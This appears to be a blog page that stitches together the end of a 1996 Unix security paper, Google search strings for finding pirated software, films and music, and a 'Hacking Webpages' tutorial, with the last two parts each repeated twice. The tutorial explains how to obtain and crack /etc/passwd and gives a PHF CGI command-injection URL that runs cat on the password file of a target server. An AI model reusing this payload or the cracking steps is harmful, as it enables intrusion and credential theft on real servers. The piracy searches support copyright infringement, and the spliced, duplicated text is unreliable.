- Crashing the X-Server: If stickybit is not set in /tmp
a number of attacks to gain
access can be performed.
- Using resolv_host_conf: Could be used to expose
confidential data like
/etc/shadow.
- Core dumped under wuftpd: Could be used to extract
password-strings.
If I don't have put out a solution I might have recommended son other paper.
If not I don't know of a paper with a solution I feel that I can recommend.
You should in these causes check with your company.
.F.1.6. EXTRA SECURITY SYSTEMS
------------------------------
Also think about if you should install some extra security systems.
The basic that you always should install is a logdaemon and a wrapper.
A firewall could also be very good, but expensive. Free tools that can
be found on the Internet is for example:
TYPE: NAME: URL:
LOGDAEMON NETLOG ftp://net.tamu.edu/pub/security/TAMU
WRAPPER TCP WRAPPERS ftp://cert.org/pub/tools/tcp_wrappers
FIREWALL TIS ftp://ftp.tis.com/pub/firewalls/toolkit
Note that you should be very careful if building your own firewall with
TIS or you might open up new and very bad security holes, but it is a very
good security packer if you have some basic knowledge.
It is also very good to replace services that you need, for example telnet,
rlogin, rsh or whatever, with a tool like ssh. Ssh is free and can be
found at URL:
ftp://ftp.cs.hut.fi/pub/ssh
The addresses I have put out are the central sites for distributing
and I don't think that you should use any other except for CERT.
For a long list on free general security tools I recommend:
" computer="" security="" frequently="" asked="" questions="">
.F.1.7. MONITORING SECURITY
---------------------------
Also monitor security regular, for example through examining system log
files, history files... Even in a system without any extra security systems
could several tools be found for monitoring, for example:
- uptime
- showmount
- ps
- netstat
- finger
(see the man text for more information).
.F.1.8. KEEPING UP TO DATE
--------------------------
It is very important to keep up to date with security problems. Also
understand that then, for example CERT, warns for something it has often
been dark-side public for sometime, so don't wait. The following resources
that helps you keeping up to date can for example be found on the Internet:
- CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
- Bugtraq mailing list. Send an e-mail to bugtraq-request@fc.net.
- WWW-security mailing list. Send an e-mail to
www-security@ns2.rutgers.edu.
.F.1.9. READ SOMETHING BIGGER AND BETTER
----------------------------------------
Let's start with papers on the Internet. I am sorry to say that it is not
very many good free papers that can be found, but here is a small collection
and I am sorry if have have over looked a paper.
(1) The Rainbow books is a long series of free books on computer security.
US citizens can get the books from:
INFOSEC AWARENESS OFFICE
National Computer Security Center
9800 Savage Road
Fort George G. Meader, MD 20755-600
We other just have to read the papers on the World Wide Web. Every
paper can not however be found on the Internet.
(2) "Improving the security of your Unix system" by Curry is also very
nice if you need the very basic things. If you don't now anything about
computer security you can't find a better start.
(3) "The WWW security FAQ" by Stein is although it deal with W3-security
the very best better on the Internet about computer security.
(4) CERT have aklso published several good papers, for example:
- Anonymous FTP Abuses.
- Email Bombing and Spamming.
- Spoofed/Forged Email.
- Protecting yourself from password file attacks.
I think however that the last paper have overlooked several things.
(5) For a long list on papers I can recommend:
"FAQ: Computer Security Frequently Asked Questions".
(6) Also see section ".G. SUGGESTED READING"
You should also get some big good commercial book, but I don't want
to recommend any.
.F.2. MONITORING PERFORMANCE
----------------------------
.F.2.1. INTRODUCTION
--------------------
There is several commands and services that can be used for
monitoring performance. And at least two good free programs can
be found on Internet.
.F.2.2. COMMANDS AND SERVICES
-----------------------------
For more information read the man text.
netstat Show network status.
nfsstat Show NFS statistics.
sar System activity reporter.
vmstat Report virtual memory statistics.
timex Time a command, report process data and system
activity.
time Time a simple command.
truss Trace system calls and signals.
uptime Show how long the system has been up.
Note that if a public netstat server can be found you might be able
to use netstat from the outside. netstat can also give information
like tcp sequence numbers and much more.
.F.2.3. PROGRAMS
----------------
Proctool: Proctool is a freely available tool for Solaris that monitors
and controls processes.
ftp://opcom.sun.ca/pub/binaries/
Top: Top might be a more simple program than Proctool, but is
good enough.
.F.2.4. ACCOUNTING
------------------
To monitor performance you have to collect information over a long
period of time. All Unix systems have some sort of accounting logs
to identify how much CPU time, memory each program uses. You should
check your manual to see how to set this up.
You could also invent your own account system by using crontab and
a script with the commands you want to run. Let crontab run the script
every day and compare the information once a week. You could for
example let the script run the following commands:
- netstat
- iostat -D
- vmstat
.G. SUGGESTED READING
~~~~~~~~~~~~~~~~~~~~~
.F.1. INFORMATION FOR DEEPER KNOWLEDGE
-------------------------------------
(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988.
(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984.
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981.
(4) Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977.
(5) Sollins, K.R. The TFTP Protocol, RFC 783, 1981.
(6) Croft, W.J. Bootstrap Protocol, RFC 951, 1985.
Many of the papers in this category was RFC-papers. A RFC-paper
is a paper that describes a protocol. The letters RCS stands for
Request For Comment. Hosts on the Internet are expected to understand
at least the common ones. If you want to learn more about a protocol
it is always good to read the proper RFC. You can find a nice sRFC
index search form at URL:
http://pubweb.nexor.co.uk/public/rfc/index/rfc.html
.F.2. KEEPING UP TO DATE INFORMATION
------------------------------------
(1) CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
(2) Bugtraq mailinglist. Send an e-mail to bugtraq-request@fc.net.
(3) WWW-security mailinglist. Send an e-mail to www-security@ns2.rutgers.edu.
(4) Sun Microsystems Security Bulletins.
(5) Various articles from: - comp.security.announce
- comp.security.unix
- comp.security.firewalls
(6) Varius 40Hex Issues.
.F.3. BASIC INFORMATION
-----------------------
(1) Husman, H. INTRODUKTION TILL DATASÄKERHET UNDER X-WINDOWS, 1995.
(2) Husman, H. INTRODUKTION TILL IP-SPOOFING, 1995.
(3) The following rainbow books: - Teal Green Book (Glossary of
Computer Security Terms).
- Bright Orange Book( A Guide
to Understanding Security Testing
and Test Documentation in Trusted
Systems).
- C1 Technical Report-001
(Computer Viruses: Preventation,
Detection, and Treatment).
(4) Ranum, Marcus. Firewalls, 1993.
(5) Sun Microsystems, OpenWindows V3.0.1. User Commands, 1992.
(6) Husman, H. ATT SPÅRA ODOKUMENTERADE SÄKERHETSLUCKOR, 1996.
(7) Dark OverLord, Unix Cracking Tips, 1989.
(8) Shooting Shark, Unix Nasties, 1988.
(9) LaDue, Mark.D. Hostile Applets on the Horizone, 1996.
(10) Curry, D.A. Improving the security of your unix system, 1990.
(11) Stein, L.D. The World Wide Web security FAQ, 1995.
(12) Bellovin, S.M. Security Problems in the TCP/IP Protocol, 1989.
.H. COPYRIHT
------------
This paper is Copyright (c) 1996 by Hans Husman.
Permission is hereby granted to give away free copies electronically. You
may distribute, transfer, or spread this paper electronically. You may not
pretend that you wrote it. This copyright notice must be maintained in any
copy made. If you wish to reprint the whole or any part of this paper in any
other medium excluding electronic medium, please ask the author for
permission.
.I. DISCLAIMER
--------------
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Google secrets
method 1
?ww.google.com
put this string in google search:
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
voila!
method 2
?ww.google.com
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
?ww.google.com
put this string in google search:
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
voila!
method 2
?ww.google.com
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
Hacking Webpages
Getting the Password File Through FTP
Ok well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file...
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.
Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted pw from a shadowed
pw file. We can now go on to talk about how to crack it.
Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system. 1.The first step that you would take is
to download or copy the file. 2. The second step is to find a password
cracker and a dictionary maker. Although it's nearly impossible to find a
good cracker there are a few ok ones out there. I recomend that you look
for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper.
Now for a dictionary maker or a dictionary file... When you start a
cracking prog you will be asked to find the the password file. That's where
a dictionary maker comes in. You can download one from nearly every hacker
page on the net. A dictionary maker finds all the possible letter
combinations with the alphabet that you choose(ASCII, caps, lowercase, and
numeric letters may also be added) . We will be releasing our pasword file
to the public soon, it will be called, Psychotic Candy, "The Perfect Drug."
As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives
you.
The PHF Technique
Well I wasn't sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But since I have been asked questions about the phf
I decided to include it.
The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file(if it works).
The best way to get root is with an exploit. Exploits are explained in the
next chapter.
Ok well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file...
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That's the main part of the file.
root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little
difference, it's shadowed. Shadowed password files don't let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in the place of a password or sometimes
they are disguised as an * as well.
Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted pw from a shadowed
pw file. We can now go on to talk about how to crack it.
Cracking a password file isn't as complicated as it would seem, although the
files vary from system to system. 1.The first step that you would take is
to download or copy the file. 2. The second step is to find a password
cracker and a dictionary maker. Although it's nearly impossible to find a
good cracker there are a few ok ones out there. I recomend that you look
for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper.
Now for a dictionary maker or a dictionary file... When you start a
cracking prog you will be asked to find the the password file. That's where
a dictionary maker comes in. You can download one from nearly every hacker
page on the net. A dictionary maker finds all the possible letter
combinations with the alphabet that you choose(ASCII, caps, lowercase, and
numeric letters may also be added) . We will be releasing our pasword file
to the public soon, it will be called, Psychotic Candy, "The Perfect Drug."
As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives
you.
The PHF Technique
Well I wasn't sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But since I have been asked questions about the phf
I decided to include it.
The phf technique is by far the easiest way of getting a password file
(although it doesn't work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file(if it works).
The best way to get root is with an exploit. Exploits are explained in the
next chapter.
Subscribe to:
Posts (Atom)